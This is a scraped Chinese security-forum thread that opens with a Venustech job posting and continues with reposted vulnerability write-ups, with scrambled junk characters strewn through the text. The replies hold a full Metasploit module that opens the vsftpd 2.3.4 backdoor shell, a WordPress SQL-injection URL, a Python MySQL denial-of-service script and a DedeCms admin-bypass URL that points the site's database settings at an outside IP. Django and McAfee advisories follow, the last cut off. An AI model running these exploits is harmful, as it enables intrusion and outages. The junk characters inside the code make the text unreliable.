最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。
    2 [9 P9 N$ X0 `% _; U& W) \9 S" P

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    3 d7 g" t5 P! w. g安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.& J) N# G( U' Q3 M1 u% w
    精通C语言编程

    2.
    ! h/ C7 N  w$ d熟练使用Linux操作系统,精通 Linux下C语言编程

    3.9 X$ O* N- M) U
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.
    - |: \8 c  [+ s熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.- ^! V; K  i/ ?- W; m' s
    熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.
    . @" m% n' B0 A. l0 g5 @  P) E" o负责产品的系统测试、集成测试工作

    2.3 a+ M* W" V+ Z2 G& o
    负责产品用例的编写,执行、修改

    3.* f) s+ w3 @1 e1 t
    负责产品性能的测试

    4.
    8 @6 W  i1 ~1 o1 r7 \) [5 M负责对外项目的支持和测试工作

    岗位要求:

    1.; v( F3 b! Q- x: ?
    掌握基本的tcp/ip知识

    2.* f8 S3 C8 J( k, l
    数通基础好

    3.
    % s5 o0 N, I  R  y! N对linux有一定的基础

    4.
    2 A  G2 ?: F$ q) ^& N6 T* N掌握数据库的搭建和使用

    5.+ w* n- Y% u) m+ H
    至少熟悉一种编程语言C/Perl/VBS/TCL

    6.' M& k# E6 ?5 E
    熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.
    : ^4 D( @9 f) E5 m  l& @; I+ ~0 x熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.1 ]& k! ?, S) h0 w/ a- Y5 Y" J! x
    对网络安全设备在网络中的部署有一定的认识

    9.
    5 h' `6 |7 R3 Y  }8 L掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.9 ]* [' Q- h) A' g$ D# S5 {0 M
    木&马检测服务、WEB漏洞扫描服务的实施

    2.* b/ X8 U3 K0 A8 ]3 _
    对服务客户的技术支持

    3.
    # L8 t; N- Z. W2 O) w
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.
    4 d* T' t+ a3 r5 e+ J2 P/ ^# X. K
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.- Z4 k& A" f# r& y) z- }3 Y
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################; q4 t* o9 G( J; W- L1 u7 X

    & z+ H/ R) L' S9 j/ T2 }' r+ N1 o* i) c  `# d( X: t( r6 u

    4 Q2 @+ I. r+ T0 a) r, I. a+ Xrequire msf/core& r6 ]: A7 P  h7 a' I8 [7 y/ i
    $ t6 f. V: k- i; I: r: ~! |) m3 E
    class Metasploit3 < Msf::Exploit::Remote
    7 f  @! U$ }! |: s7 IRank = ExcellentRanking
    ' b: ?/ E, o8 S
    8 p: o& Y0 p: R# q) ?4 Rinclude Msf::Exploit::Remote::Tcp
    * Z: m- D% m) L% A/ s9 j# c0 f- z9 Q% ~- a6 b- ]8 D( N" |
    def initialize(info = {})" G5 b4 J! P, `! X9 h- P
    super(update_info(info' Y" t" C- j  y: [9 m! k; f
    Name => VSFTPD v2.3.4 Backdoor Command Execution
    5 D0 C$ v0 Z" C! R' D8 [7 r) i( LDescript_ion => %q{" o0 C8 n4 V7 n( E. Q
    This module exploits a malicious backdoor that was added to the VSFTPD download
    ) ^. t5 N0 V: A3 t$ D9 @  E2 Earchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
    / F; l- ^6 R. i7 rJune 30th 2011 and July 1st 2011 according to the most recent information
    # M2 F& n% A9 m3 a8 a5 b4 Kavailable. This backdoor was removed on July 3rd 2011.& b7 A. C- i# [9 N
    }
    & J% |# p) ]8 H! c1 b6 M; iAuthor => [ hdm mc ]9 w1 U; Z0 n7 O( ?: I4 H- b1 p  W
    License => MSF_LICENSE
    . {& o( l# X7 n. qVersion => $Revision: 13099 $5 k9 h, F0 Z, U
    References =>5 T/ T/ T* j/ ~) u" S7 Y/ i8 n* ?/ h
    [3 e0 h: X* J5 k; {1 s: L: q
    [ URL http://pastebin.com/AetT9sS5]# x1 H" s- ]5 P* u" e) G, [0 }
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
      t, N" S! g& \3 G9 @]' ], i9 B* y" g( d. b
    Privileged => true
    # o2 k# U( M! }" @  @5 [Platform => [ unix ]: ~* C9 |# t1 e% s, t* S
    Arch => ARCH_CMD& u3 U6 n% h+ W% ?
    Payload =>
    ! s+ B; Q9 F& R6 G$ x{! N6 H6 S1 S' X7 T3 `
    Space => 2000
    9 u' h: t6 }5 ~" M- ^. X% zBadChars =>
    ; z5 Z: L3 E' o& l0 R  O% w9 jDisableNops => true0 G( R8 k- q; p/ V3 H4 C* _
    Compat =>( R& k% x9 d5 g
    {
    - k- D/ t$ R* w0 \9 i- E- F" K4 kPayloadType => cmd_interact) p9 u- X$ e2 G& B0 P6 |$ A
    ConnectionType => find! s, B7 q% P- l% B  `* [
    }
    1 [* S7 m1 f" u0 \! A# D& L}
    - F7 R3 a5 O$ m' A5 f8 L' P6 TTargets =>% |$ T4 p  ?4 X6 I0 D. d& w
    [
      Y/ H( T' I9 G[ Automatic { } ]# v4 ~& k& ^: x) m
    ]" P8 t2 w+ P& _
    DisclosureDate => Jul 3 2011
    6 R" U4 v- c) C, F% U+ Q5 M& eDefaultTarget => 0))
      M+ K) ~& J' O5 o5 j2 \( \. M# }8 \, h' k# \5 s
    register_options([ Opt::RPORT(21) ] self.class)
    1 B( o, I$ B) m, x  |7 {end
    3 I: P( _7 ]. G& I
    8 L/ O; u0 l, ?2 D9 r4 wdef exploit# s2 p: h1 P% k% m

    ' ]3 E: V. a5 @8 K: Qnsock = self.connect(false {RPORT => 6200}) rescue nil, Z. R  J" g% t. C. b/ O0 W% \4 ^
    if nsock
    1 ?3 G8 M6 G, L0 ~8 o9 Xprint_status(The port used by the backdoor bind listener is already open); K+ z4 e- w4 s4 E8 n1 K+ Y& e( s
    handle_backdoor(nsock)
    % I4 P8 ]4 K: ^& R8 jreturn0 D7 H5 \- {- m: G6 L7 }2 H
    end
    ; m' q3 z; R' Z  K
    5 M! ^7 d+ E  X7 q' [8 J" U# Connect to the FTP service port first* t+ }' U1 n/ F: Q! r& W4 Q
    connect% x: D! H0 N- _5 t! Y; a

    , [  J6 G2 {; o5 Z+ e# x# W; i$ Hbanner = sock.get_once(-1 30).to_s
    2 J# S0 G3 v! d  Pprint_status(Banner: #{banner.strip})! A( N  b: ?& `0 U, D( [+ d& R

    " J* E' q% M/ d7 zsock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
    + q) Z9 \1 P4 L# F  ])
    # l3 E  t& x8 Vresp = sock.get_once(-1 30).to_s3 ]* R, e) e) U$ b+ z
    print_status(USER: #{resp.strip})
    6 V# b" V% S  {) T+ i" Q& e2 P8 O7 ]" ]0 _# V  j+ y9 L( `
    if resp =~ /^530 /% o/ }1 \/ B# H; u2 k4 w
    print_error(This server is configured for anonymous only and the backdoor code cannot be reached). J% J. {+ `7 t* |6 Y% c
    disconnect
    2 {& X# o' }" f2 O; [return% t$ a8 ?; Z# l& v" f1 z4 s9 A& p7 s+ N
    end
    ' Q5 R5 ]( s: |% @
    % _2 C. i1 H. i8 bif resp !~ /^331 /4 ?+ K3 h( j* v+ ]( {' o
    print_error(This server did not respond as expected: #{resp.strip})
    $ \' V- \5 i) p; `& hdisconnect! ?3 \6 }1 V" N" E# Z! ^0 {0 y
    return
    6 N& G3 k! i7 f' }end- _- R6 \/ S( L4 m8 f) c# d

    0 I- k+ j* c- B/ h4 hsock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}: U; Z6 ^9 B% V4 d2 p: h
    )
    ) [3 m1 R* N+ G1 a( t8 }) A  o6 ~! m/ e- j7 |
    # Do not bother reading the response from password just try the backdoor4 a0 \# W2 W* l' x' L
    nsock = self.connect(false {RPORT => 6200}) rescue nil
    0 e. X, E1 T8 x( M$ I0 Vif nsock
    2 s( v0 k" L" a. X; h8 zprint_good(Backdoor service has been spawned handling...)
    ' D# d" F$ l/ U- Nhandle_backdoor(nsock)
    3 X! j! c1 T5 E5 i$ j7 o% Freturn( a$ t: N8 f" @' n1 e: V
    end
    + c, E' T; H, b! F( e; W, {+ H9 }" g$ Y7 G( h
    disconnect. e) S$ E) Y- ~% g! m7 R# J& U

    . n+ ?6 b% j0 N; qend
    # T' I1 V6 d0 v  S( Q/ }4 P) ^, @; b) m
    def handle_backdoor(s)
    / M9 X$ r& o2 C9 p7 Z8 H/ [) _% {) q- i- r3 `
    s.put(id7 \4 F; l% s7 H
    )+ r4 u, d( y& x5 D: U

    " l' d4 q/ S( B5 t" r- e! Jr = s.get_once(-1 5).to_s8 b* _6 d. h) u4 x
    if r !~ /uid=/
    - L9 |9 N0 {" O9 @/ ~print_error(The service on port 6200 does not appear to be a shell)& }1 [+ e% }9 M
    disconnect(s)
    ) k, k) Y1 m' z9 s5 w" M  A5 oreturn
    * F: F/ O7 G3 i( r! tend
    ( j, F  z: [' s0 c; _) L, F8 l+ Y9 p& i; s" j& O
    print_good(UID: #{r.strip})
    2 Q$ n  A& A9 t4 r1 `
    ' F* d) D: R7 s" k$ As.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
    4 H2 u- T: Z6 N# Ohandler(s)2 M) X2 K( H- `' ]$ u. h1 S" F
    end
    / p$ W5 y# t( L
    - C) n- f+ v8 @8 f9 c! Cend复制代码
    . @6 g: x/ s/ W3 F9 B3 t' g9 S( e5 h3 V4 J% T$ e& A

    # ~2 b- c; y+ T- C1 S
    # g! S& V' K' P- V  e/ T& X+ @3 D$ g& X8 |

    2 n/ j6 p# n7 C( @( w$ R( Y! P4 J" i$ j! R8 t. G

    7 ^2 P4 Y! k0 g, X4 m8 c) M' H
    , t/ K8 P& ?0 \7 N+ O7 |# g9 P' W7 y' q$ b

    ) i% c0 ]9 R; L+ I
    # h: R* b* f. m7 p4 e
    / F0 n# P; ~  \- Q& U6 k
    ) ^' I% X9 E  o5 J% t. ?9 F; o7 p5 X3 I, r* w% |3 n3 u

    ' Z0 [8 B: l0 L8 G- K
    4 U2 P1 o" t7 m$ |% c( g2 ~
    ; K# d. g& f: k9 G( j$ `+ y9 t) z# C/ Y7 R
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:1 c7 {; D; R/ O
        i  M) j0 T! `5 B8 K& Z
         - A- o, t2 ~2 a/ `" g; |
      
    ) Z: Q# V3 X$ @: T) CSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    8 U3 q8 N5 I" d# Wallows an authenticated user to execute arbitrary SQL commands via the id
    3 A1 m+ i3 W: m9 w" pparameter to wp-admin/admin.php.
    - l/ f$ o; X/ P/ K  
    + `! \  `! v) g9 R' C8 I   
    7 {* O( o- @$ d0 [% G) ~+ ^  
    9 d; L2 F" S6 y$ i9 ]) h& L. C2. Proof of Concept:
    + d0 L% J9 L1 z1 R  " d4 ~3 C5 g# Z2 j; M8 E; M
       " ]; N! s3 [  P8 L" ?
      9 f2 X4 _/ z# v  a4 ^. b7 e
    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id/ K. b, i, L, W" _1 w
    =1 AND SLEEP(10)! N6 W: ^4 L- ~8 y  C! H" t

    6 r* M1 Y8 }! g1 j) T  
    # e* B) e* m( p% @% c6 l   
    & |! }  i9 x% G/ }/ r# y, K+ m$ m  
    1 q% B5 b4 y% p$ _2 y+ I$ l3. Solution:
    - s# H2 E% j6 N  
    5 [: b3 _* v& M" k1 s% v, [     
    7 p$ s4 v: Q0 i6 c: @" c  
    * h9 J- ]0 ~) d# Z( {The plugin has been removed from WordPress. Deactivate the plug-in and wait
    - D" u- \& U( i: t, `4 Zfor a hotfix.8 {# |& B. @  {6 Q1 R
      
    1 d8 K* I* I9 |' I' ]- P2 e   
    4 n8 b, v9 e- D  x& j2 N  
    , S, p. L, `# c. _! A4. Reference:  e0 j; a1 @) u0 S( ~  G
      ' m6 {8 A' v( w
       ; p5 S( L4 p2 u  ?( \8 J
      8 q4 X7 c1 U3 y
    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje/ Z( W- \* O( X7 J7 }
    ction-sqli/+ L0 L; I- @2 K
      
    / b, w/ Y2 l2 q5 s. \9 Zhttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    4 t' W1 @% E9 r" l# d$ B6 r" {- Z0 ]

    8 {: i) F3 r% X: F3 _" J3 t% h( @4 _/ q" [1 b: I2 w
    ' f7 Q% F8 ?6 z5 `7 j$ l0 i
    3 ^: E# U* Y  h2 w

    ) H  l6 h( {, p/ e7 V9 Z: t& o# Z2 K3 f- t9 V1 {

    7 h  n+ I/ R; _9 m, h: Z: j2 c, c7 v

    7 j: i' w: {5 B( _& z# C4 ]; W5 V* e7 i/ O1 g" p

    ' b( v! M) W% \5 b% v: k" G: t
    + g# A- l7 y* L& s7 Z) p; P! Q' X9 ~, F
    ' w) ~6 a+ E' {+ y
    2 C- Q  E0 U3 J2 M2 Y" z

    $ Y7 ?9 N& I8 E. \+ q& _- V' L7 D) N- V0 w# W6 o, t5 I" Z
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys4 ~! F: p0 b- e- z: i: D7 F! Y
    * [- B6 q. R/ Z
    print "
    3 W. [. \) b) E$ b"
    ' [! u+ Y8 L6 sprint "----------------------------------------------------------------"
    * f# h# s, Q/ x+ sprint "| MySQL 5.5.8 Null Ptr (windows)                                |"1 t- a$ a0 ?# |
    print "| Level Smash the Stack                                         |"- e( x; {5 A+ z/ x$ m) A% O4 A
    print "----------------------------------------------------------------"
    ! l% y" [1 f1 n- d/ Lprint "  t0 s4 }0 t% z* c
    "
    3 z) Y$ v1 M% ^3 H
    ; `' `. s8 e# y& G# \buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
    7 D& h1 `# ?2 V1 P. i"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")8 ?3 C" l, }/ k
    9 ^" p# q9 v  ^
    buf2=("x11x00x00x00x03set autocommit30")3 E9 [4 j- F$ d3 o
    $ j) ]- Q  M) w# d- x: F" B8 E
    def usage():: O3 ~2 K& b( `1 M- a* X
    print "usage : ./mysql.py <victim_ip>". M1 Z4 L3 d- x9 W" x" @( N
    print "example: ./mysql.py 192.168.1.22": ]# M$ x4 s/ b! ^: C
      e# r( o( H( `1 E0 y

    6 p3 Y; D, c* Y6 R% H; n( [) Xdef main():1 G( B- r& q2 F/ y7 G
    if len(sys.argv) != 2:
    " N0 _$ d0 H- R* t6 B+ ~usage()
    - x$ ]8 [) }4 j# @8 q, Wsys.exit()
    0 {: p& w& _( H% @$ H' X* W* f, bs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    / l' K3 S1 ^4 h- M  Y5 G, n ( |6 Q/ Q% F' ^8 P' J
    HOST = sys.argv[1]
    3 j- {( o) C% U# A0 I! HPORT = int(3306)% T6 t: `5 D2 ]  c8 D- Y+ q
    s.connect((HOST,PORT))8 n/ `$ ^' f$ P4 V/ M
    print "
  • Connect"
    ) H5 Y( }% e. Q4 is.send(buf)+ Y7 d4 T3 V5 ^, P1 a* e
    print "
  • Payload 1 sent"4 y6 B% H8 c1 O$ t* ]% J
    s.send(buf2)
    ; F/ x( U# K' v. {& m" {print "
  • Payload 2 sent
    0 f- C" L5 M& d8 A  G. l5 w", "
  • Run again to ensure it is down../ Y7 ~: T0 O9 P- I9 u5 F5 i
    "
    7 K% ?, H8 M. js.close()' R# y0 K$ K7 a' x. T$ s" c
    . P4 q' P4 G" ?7 l/ y! \
    if __name__ == "__main__":
    9 q/ N9 z! A! Q1 ?main()% x2 G' E$ ?+ g7 B
    0 W& w1 S* G8 M" z8 P4 c

    , r2 T. B( ]* K! c7 E  g% m
    ! B9 _3 b6 z3 h; B5 ]6 E2 U( A6 N8 I2 Z: X1 h: B

    : ]- k% ~& Q9 N- a! O8 W
    ) P) V' [% \+ ~- U3 X% E
    8 X  b6 \; k! l0 ^# v. |# L6 [; _! i7 g# ^9 |" F# f# ]; D: [! r) f

    3 P, p  R5 i4 @( u8 A
      ?3 x& x) M' v3 b; a( j9 h
    ' f& C4 u9 K4 P' P& o# F" B7 J7 [# k
    / i: ]* {+ G1 v* B1 n- ?
    8 Q4 ], W- V7 F6 c4 y! q
    8 P) y; G' F7 V5 r4 A7 \

    8 B; {/ \5 Y" y1 K+ E. q
    6 X! T" r* b- d  K; n, r5 y- m, C6 B* Q  f2 `
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机

    ) {- L( V" c$ |" T2 L( hhttp://www.sitedir.com.cn/video/4.swf
    ! a2 I0 B: s7 i( T
    . x. n6 }& V( a) }& h
    0 z# f6 L1 B; T6 G8 J, t) [% b/ p
    ' |: N0 K! F5 B8 k9 O6 m+ `) j5 H/ i" y) _0 p

    - @6 ]6 q3 X# Z- b* r1 _6 j; w& O9 S" b+ O- @
    9 r  y* v# ?. @! _* m/ b) J5 o( L
    6 v) G0 ?. C, k3 b2 F& s# t

    % v) \- e6 U1 V: k" D4 X9 s6 A& E% Z! E

    , L, k9 e. r: A
    ; R# V& [' p6 r; G0 u. ~" |
    - T6 S! R3 v  Z4 Y7 {4 @& `% E
    ) \! X# j% z1 [( m! G5 M  R: l
    2 P. V8 ~3 Y+ N/ |8 p) B8 R, T: u  [6 o1 h' r/ V' q
    7 o' R+ [) J. L2 `2 e5 N6 J: N
    & A! v7 N" n3 e9 {+ \! d" R
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root
    0 C4 D7 B7 O! J- ~: m; b# {
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台

    6 f2 l2 R) G8 O
    此漏洞的前提是必须得到后台路径才能实现

    2 N( \; N' G7 h; b
    官方临时解决办法:
    & _" g2 ]7 l% p6 k2 A. `% x
    找到include/common.inc.php文件,把:
    6 h0 h- e: o; }) W! f. N# ^4 y+ W/ R
        foreach($_REQUEST as $_k=>$_v)
    $ A3 G6 i% `0 D8 v4 ], |+ L    {- U! G7 S' B  `
            var_dump($_k);
    ) m7 w$ ~5 g: ~& a4 d/ x8 M' u        if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )3 f- [) s0 J  C: f/ f
            {
    6 _# P9 s; X* _5 G% s/ U* U# g; v            exit('Request var not allow!');
    ' q6 Q. Z4 G4 G        }  e$ j0 m! l% E# P& ]
        }
    . g9 N; N& c9 P6 g/ w7 X5 u
    换成:
    . t5 ^6 L. m  C" Z/ R, ]4 T; M, J- s
        //检查和注册外部提交的变量) }; x; C, O# A4 }
        function CheckRequest(&amp;$val) {& q, j9 m$ a, y  ~. Y3 x  l/ l& u
            if (is_array($val)) {
    ; a9 `: y9 v6 j            foreach ($val as $_k=>$_v) {
    + C( r  Q8 v- N+ Q                CheckRequest($_k);
    , Q! a4 W% q0 I: H                CheckRequest($val[$_k]);- H) w7 Y# i# V) M2 E
                }# V% N+ D8 n! H% R# a7 {
            } else
    7 u( x( V. m5 L+ A; D# i! m        {
    3 d; s1 Q& G' T            if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )* \1 ?5 r0 ]8 g0 q7 i- K
                {
    . o' D7 C: e# I3 f, d- w                exit('Request var not allow!');
    * @' s8 {2 v0 {- o# S2 W            }+ j  r2 Z9 E$ {. D! K2 i' g
            }
    ' C6 d8 L! D- q& ^% l    }
    ! S! V+ R2 i$ ]3 \) m    CheckRequest($_REQUEST);
    ; m7 W  I  V9 M
    7 ^4 F( F: Z2 F
    % n4 ]' j+ t1 I7 G  @# o

    6 a9 f/ C: Q) a  E' Q7 U" |4 m9 f/ u% M  p( H

    ; H9 i# A% V8 M8 D  V
    + [' o8 U0 l9 @' P6 {+ F" Z& \* B1 C& {* u3 P5 d) J+ `( }
    " b( c+ ~5 S+ T2 G1 i- K0 n
    7 q* O& f; S; |0 }

    ) b: }- H* Q9 }( ]$ H( i( Y' }3 M( ]! j. u9 r% a% `/ S* _

    7 e$ x3 {  e9 s/ K1 O6 J6 ?1 T5 W5 F; H7 `' x5 e

    ' f9 Y. k9 @3 l; p2 a
    - q& B3 y+ z4 P' f- g: u- x9 j. i8 p2 R6 q% \1 u% q
    ' N0 N+ }+ \* @0 m; z

    ; s. Y4 j8 z. Y# G6 j6 N2 L4 N, k/ y8 o+ Y6 e
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>. |0 W+ k% R3 C. V* i6 M# P
    & J" e( X! c1 ?+ h$ L! h0 q
    http://www.sitedir.com.cn/video/8.swf[/quote]8 E  M6 W6 n( R4 h) n
    1 O/ R: `5 |4 _2 j& L

    : _/ ]$ g0 J5 D( H# G1 i2 w
    $ ]) m! ]* K6 l0 S+ o$ E1 M$ B0 s' {1 a

    ) Z$ [9 ^7 J) e4 f0 z, A6 M" ~6 U
    9 n# o8 R; |8 v, H+ r+ p+ |- R; u3 [, U" f. f( E, }' v

    / q3 o8 }; M9 {  U7 q
    2 m$ D1 F- N& P5 T% h% y. @  L& _5 [5 E  t8 e1 b, _2 v  k1 O
    . V% L$ {/ K/ u% I  c

    3 l6 B0 U- {5 S0 s$ }2 \2 ^0 v) I: C, Y, J4 I

    6 c# D9 ]% C9 x6 h9 V8 L: g+ y! b& w
    - [% S4 X' R' a; p5 U
    . ?  D: a9 ^: b5 V- k

    ( |- L4 b5 f& {% C( J8 ^公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12
    - @3 ?8 q9 g( F# n9 a& [
    影响版本:3 }$ \) Y# `, u) y2 c
    Django 1.2.5: |6 C5 h/ A4 C& S1 F5 g5 {6 x% Y  [
    Django 1.3 beta 1
    : }1 D5 N0 ^( V& Q, H2 hDjango 1.2.48 r2 V5 D3 l, r, ]$ t
    Django 1.2.2" X$ c4 T* q; D! W0 O# f+ R( b
    Django 1.2
    ' K+ P% U8 X2 K! Y# z5 U( h9 l
    漏洞描述:
    ' G% A2 A. k7 @+ ?  q
    Django是一款开放源代码的Web应用框架,由Python写成。2 h- r) K! ^( g3 |% Z
    Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    0 |: I5 \3 Y( |' F1 s1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。# u& ], h+ U; F2 n( w' I
    2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。' H0 @2 f) d% x* ?7 j5 K
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
    : R7 z: `5 ]5 G  T$ a  ~  L4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    6 w( J" M- l$ N  A' h
    细节参考: " B: B" s! ~/ y  U8 w" p* u& \
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/' c: E: i0 @  i
    http://secunia.com/advisories/45939/

      I; ]( h$ V4 ?0 P

    ) a% U. s' W* Q# G1 H8 g( i
    9 k8 c( B9 V* L; L
    8 \& T# F; F+ ]7 O( \  r9 @7 |# x
    7 }0 B1 ^. r# ?; s$ b: k

    ! N9 \5 x& ?+ n/ E
    ' u( E7 K! h! J
    - x6 C) f& _! ~& A* a$ i, S9 V  M) m. \
    . d) n: |8 X: `/ \; |

    2 O* j6 G4 A/ z9 {* e1 ?, A' Z* F1 v3 `

    ; J% D1 q+ Q& m6 e* H
    $ [* |; v- z3 \# E1 s; @5 t$ Z2 S
    & O6 a* I# Q5 |% u* n  @
    % j1 p- Z) k/ A6 ~& H6 K$ ]- E: R5 t/ D; y! F6 h

    8 s) s! M5 O, ~. t6 V+ ]
    7 T3 v6 f5 \+ s6 ^( @& ~% F" A公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code. ]1 q5 e* y1 D1 e+ [2 n
    影响版本: McAfee LinuxShield <= 1.5.1
    7 Y2 u# G& k+ v( b7 p; b9 W9 [远程攻击: Yes - \0 A  s+ V0 e2 ^
    本地溢出: Yes3 k. u6 B+ I" x# }/ {8 Z4 \( j, l
    背景阅读:
    $ z. P. @. A  n) x===========) O6 E/ u; G  M  i3 A
    ( Q8 m6 V, w) X! q& C2 O
    LinuxShield detects and removes viruses and other potentially unwanted
    $ g- L# Z' h  n+ y( [' R) Asoftware on Linux-based systems. LinuxShield uses the powerful McAfee
    " u4 f6 j9 t7 z/ j' P$ Cscanning engine ?&amp;#65533;&amp;#65533; the engine common to all our  \' Q2 R* d6 L1 D2 c) H
    anti-virus products.
    0 }+ C  T4 r3 O' z; H+ ?8 a" g3 P1 z- o4 J: A8 ^' N, ?5 H6 Z
    Although a few years ago, the Linux operating system was considered a" A3 Y) m2 v# f5 r
    secure environment, it is now seeing more occurrences of software
      q0 N( u' @+ ?; h7 Zspecifically written to attack or exploit security weaknesses in
    * E8 b4 D# E7 Y7 l- HLinux-based systems. Increasingly, Linux-based systems interact with
    # \0 x& H+ m1 j- t1 j( `  MWindows-based computers. Although viruses written to attack Windows-. ?; @  s" Y; T  n3 A: @7 b
    based systems do not directly attack Linux systems, a Linux server" }0 Q: _$ n9 j/ r* z
    can harbor these viruses, ready to infect any client that connects to: ]# @- V! c+ ], J
    it.
    ) a% D) Q* g: v0 _/ _
    ! Q0 H- s2 e/ D# O! uWhen installed on your Linux systems, LinuxShield provides protection
    8 c" G1 a8 [: }; @" _0 i, d& Lagainst viruses, Trojan horses, and other types of potentially2 t3 J9 @& L) Y$ ]5 S
    unwanted software.
    7 v9 m8 o1 B  T9 }$ x6 k
    7 e% o+ X- l: x8 oLinuxShield scans files as they are opened and closed( i+ S4 V4 o/ x# |! U
    ?&amp;#65533;&amp;#65533; a technique
    7 W+ y1 n9 K6 Y6 I7 s7 p) hknown as on-access scanning. LinuxShield also incorporates an" C: C& t8 r. ~* ]/ M
    on-demand scanner that enables you to scan any directory or file in' M& p' `( Y& t$ f; V+ m
    your host at any time., c' Q% `3 q: `6 n% _- v
      {! S6 U0 o/ Y# \3 D  H; O
    When kept up-to-date with the latest virus-definition (DAT) files,9 K0 i( W/ n1 h7 n
    LinuxShield is an important part of your network security. We, A% ^7 S3 {. m3 e, p
    recommend that you set up an anti-virus security policy for your( r1 C2 h9 c+ o: T' o! ]
    network, incorporating as many protective measures as possible.# ]% Q& S1 ]3 w& a) R  z5 l

    2 Q, S5 _. f! \* |- g) r5 [LinuxShield uses a web-browser interface, and a large number of7 K! E. |* `% E# N4 X$ j' N
    LinuxShield installations can be centrally controlled by ePolicy( {' M& r2 R2 [
    Orchestrator.# C* O) L  N% l5 r
    2 D# K: P- C7 t
    (Product description from LinuxShield Product Guide)
